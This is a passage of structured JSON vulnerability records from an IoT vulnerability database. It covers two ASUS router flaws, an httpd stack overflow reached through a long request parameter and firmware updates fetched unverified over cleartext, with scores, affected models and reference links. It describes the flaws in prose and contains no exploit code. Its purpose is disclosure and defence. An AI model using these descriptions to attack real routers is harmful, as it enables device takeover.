"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2017-12754",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2017-32450",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-12754",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-12754",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-12754",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-12754",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-32450",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201708-443",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-32450"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007274"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-443"
},
{
"db": "NVD",
"id": "CVE-2017-12754"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack buffer overflow in httpd in Asuswrt-Merlin firmware 380.67_0RT-AC5300 and earlier for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by sending a crafted http GET request packet that includes a long delete_offline_client parameter in the url. plural ASUS For devices Asuswrt-Merlin Firmware and ASUS The firmware contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC5300 and others are wireless routers from ASUS. ASUSAsuswrt-Merlin is the firmware running in it. Httpd is one of the embedded http servers. A stack buffer overflow vulnerability exists in Asuswrt-Merlin380.67_0RT-AC5300 and previous versions of httpd in several ASUS products",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12754"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007274"
},
{
"db": "CNVD",
"id": "CNVD-2017-32450"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-12754",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007274",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2017-32450",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201708-443",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-32450"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007274"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-443"
},
{
"db": "NVD",
"id": "CVE-2017-12754"
}
]
},
"id": "VAR-201708-1179",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-32450"
}
],
"trust": 1.2386813426923076
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-32450"
}
]
},
"last_update_date": "2025-04-20T23:23:37.803000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://asuswrt.lostrealm.ca/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007274"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007274"
},
{
"db": "NVD",
"id": "CVE-2017-12754"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "https://github.com/coincoin7/wireless-router-vulnerability/blob/master/asus_deleteofflineclientoverflow.txt"
},
{
"trust": 1.6,
"url": "https://asuswrt.lostrealm.ca/changelog"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12754"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12754"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-32450"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007274"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-443"
},
{
"db": "NVD",
"id": "CVE-2017-12754"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-32450"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007274"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-443"
},
{
"db": "NVD",
"id": "CVE-2017-12754"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-11-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-32450"
},
{
"date": "2017-09-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-007274"
},
{
"date": "2017-08-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-443"
},
{
"date": "2017-08-09T15:29:00.183000",
"db": "NVD",
"id": "CVE-2017-12754"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-11-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-32450"
},
{
"date": "2017-09-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-007274"
},
{
"date": "2020-05-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-443"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-12754"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-443"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ASUS For devices Asuswrt-Merlin Firmware and ASUS Firmware buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007274"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-443"
}
],
"trust": 0.6
}
}
VAR-201411-0483
Vulnerability from variot - Updated: 2025-04-13 23:27ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U, and possibly other RT-series routers before firmware 3.0.0.4.376.x do not verify the integrity of firmware (1) update information or (2) downloaded updates, which allows man-in-the-middle (MITM) attackers to execute arbitrary code via a crafted image. Supplementary information : CWE Vulnerability type by CWE-345: Insufficient Verification of Data Authenticity ( Inadequate verification of data reliability ) Has been identified. ASUS RT-Series Wireless Routers is a wireless router device. There is a middleman security bypass vulnerability in ASUS RT Series Wireless Routers. An attacker can exploit a vulnerability to bypass certain restrictions and obtain sensitive information. The following products are affected: ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. In short, the router downloads via clear-text a file from http://dlcdnet.asus.com, parses it to determine the latest firmware version, then downloads (again in the clear) a binary file matching that version number from the same web site. No HTTP = no assurance that the site on the other end is the legitimate ASUS web site, and no assurance that the firmware file and version lookup table have not been modified in transit.
In the link below I describe the issue in detail, and demonstrate a proof of concept through which I successfully caused an RT-AC66R to "upgrade" to an older firmware with known vulnerabilities. In concept it should also be possible to deliver a fully custom malicious firmware in the same manner.
This applies to the RT-AC68U, RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. It may also apply to the RT-N53, RT-N14U, RT-N16, and RT-N16R since they use the same firmware base but a different sub-version.
This has been fixed as an undocumented feature of the 376 firmware branch (3.0.0.4.376.x).
Details and POC: http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html
-- Regards, David Longenecker @dnlongen
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0483",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "tm-ac1900",
"scope": "eq",
"trust": 1.6,
"vendor": "t mobile",
"version": "3.0.0.4.376_3169"
},
{
"model": "rt series",
"scope": "lte",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.374.x"
},
{
"model": "rt",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.376.x"
},
{
"model": "rt-series wireless routers",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n66u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n66r",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n56r",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n53",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n16r",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-n14u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac66r",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac56u",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
},
{
"model": "rt-ac56r",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07699"
},
{
"db": "BID",
"id": "70791"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005239"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1415"
},
{
"db": "NVD",
"id": "CVE-2014-2718"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asus:rt_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005239"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "David Longenecker",
"sources": [
{
"db": "BID",
"id": "70791"
},
{
"db": "PACKETSTORM",
"id": "128904"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1415"
}
],
"trust": 1.0
},
"cve": "CVE-2014-2718",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2014-2718",
"impactScore": 6.9,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07699",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-70657",
"impactScore": 6.9,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:C/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-2718",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-2718",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2014-07699",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201410-1415",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-70657",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07699"
},
{
"db": "VULHUB",
"id": "VHN-70657"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005239"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1415"
},
{
"db": "NVD",
"id": "CVE-2014-2718"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U, and possibly other RT-series routers before firmware 3.0.0.4.376.x do not verify the integrity of firmware (1) update information or (2) downloaded updates, which allows man-in-the-middle (MITM) attackers to execute arbitrary code via a crafted image. Supplementary information : CWE Vulnerability type by CWE-345: Insufficient Verification of Data Authenticity ( Inadequate verification of data reliability ) Has been identified. ASUS RT-Series Wireless Routers is a wireless router device. There is a middleman security bypass vulnerability in ASUS RT Series Wireless Routers. An attacker can exploit a vulnerability to bypass certain restrictions and obtain sensitive information. The following products are affected: ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. In short, the router downloads via clear-text a\nfile from http://dlcdnet.asus.com, parses it to determine the latest\nfirmware version, then downloads (again in the clear) a binary file\nmatching that version number from the same web site. No HTTP = no assurance\nthat the site on the other end is the legitimate ASUS web site, and no\nassurance that the firmware file and version lookup table have not been\nmodified in transit. \n\nIn the link below I describe the issue in detail, and demonstrate a proof\nof concept through which I successfully caused an RT-AC66R to \"upgrade\" to\nan older firmware with known vulnerabilities. In concept it should also be\npossible to deliver a fully custom malicious firmware in the same manner. \n\nThis applies to the RT-AC68U, RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R,\nRT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. It may also apply to the\nRT-N53, RT-N14U, RT-N16, and RT-N16R since they use the same firmware base\nbut a different sub-version. \n\nThis has been fixed as an undocumented feature of the 376 firmware branch\n(3.0.0.4.376.x). \n\nDetails and POC:\nhttp://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html\n\n-- \nRegards,\nDavid Longenecker\n@dnlongen\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-2718"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005239"
},
{
"db": "CNVD",
"id": "CNVD-2014-07699"
},
{
"db": "BID",
"id": "70791"
},
{
"db": "VULHUB",
"id": "VHN-70657"
},
{
"db": "PACKETSTORM",
"id": "128904"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-70657",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70657"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-2718",
"trust": 3.5
},
{
"db": "BID",
"id": "70791",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "128904",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005239",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1415",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07699",
"trust": 0.6
},
{
"db": "XF",
"id": "98316",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-70657",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07699"
},
{
"db": "VULHUB",
"id": "VHN-70657"
},
{
"db": "BID",
"id": "70791"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005239"
},
{
"db": "PACKETSTORM",
"id": "128904"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1415"
},
{
"db": "NVD",
"id": "CVE-2014-2718"
}
]
},
"id": "VAR-201411-0483",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07699"
},
{
"db": "VULHUB",
"id": "VHN-70657"
}
],
"trust": 1.3441403886666665
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07699"
}
]
},
"last_update_date": "2025-04-13T23:27:35.303000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.asus.com/jp/"
},
{
"title": "Cellspot router firmware update information",
"trust": 0.8,
"url": "https://support.t-mobile.com/docs/DOC-21994"
},
{
"title": "ASUS RT Series Wireless Routers patch for middleman security bypass vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/51508"
},
{
"title": "FW_RT_AC68U_30043763715",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=54536"
},
{
"title": "FW_RT_AC68U_30043763626",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=54537"
},
{
"title": "FW_RT_AC68U_30043761663",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=54538"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07699"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005239"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1415"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-345",
"trust": 1.1
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70657"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005239"
},
{
"db": "NVD",
"id": "CVE-2014-2718"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://seclists.org/fulldisclosure/2014/oct/122"
},
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/70791"
},
{
"trust": 2.1,
"url": "http://dnlongen.blogspot.com/2014/10/cve-2014-2718-asus-rt-mitm.html"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128904/asus-router-man-in-the-middle.html"
},
{
"trust": 1.1,
"url": "https://support.t-mobile.com/docs/doc-21994"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98316"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2718"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2718"
},
{
"trust": 0.8,
"url": "http://dnlongen.blogspot.jp/2014/10/cve-2014-2718-asus-rt-mitm.html"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/98316"
},
{
"trust": 0.3,
"url": "http://www.asus.com/"
},
{
"trust": 0.1,
"url": "http://dlcdnet.asus.com,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-2718"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07699"
},
{
"db": "VULHUB",
"id": "VHN-70657"
},
{
"db": "BID",
"id": "70791"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005239"
},
{
"db": "PACKETSTORM",
"id": "128904"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1415"
},
{
"db": "NVD",
"id": "CVE-2014-2718"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-07699"
},
{
"db": "VULHUB",
"id": "VHN-70657"
},
{
"db": "BID",
"id": "70791"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005239"
},
{
"db": "PACKETSTORM",
"id": "128904"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1415"
},
{
"db": "NVD",
"id": "CVE-2014-2718"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07699"
},
{
"date": "2014-11-04T00:00:00",
"db": "VULHUB",
"id": "VHN-70657"
},
{
"date": "2014-10-28T00:00:00",
"db": "BID",
"id": "70791"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005239"
},
{
"date": "2014-10-29T12:11:11",
"db": "PACKETSTORM",
"id": "128904"
},
{
"date": "2014-10-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201410-1415"
},
{
"date": "2014-11-04T22:55:06.417000",
"db": "NVD",
"id": "CVE-2014-2718"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07699"
},
{
"date": "2017-08-29T00:00:00",
"db": "VULHUB",
"id": "VHN-70657"
},
{
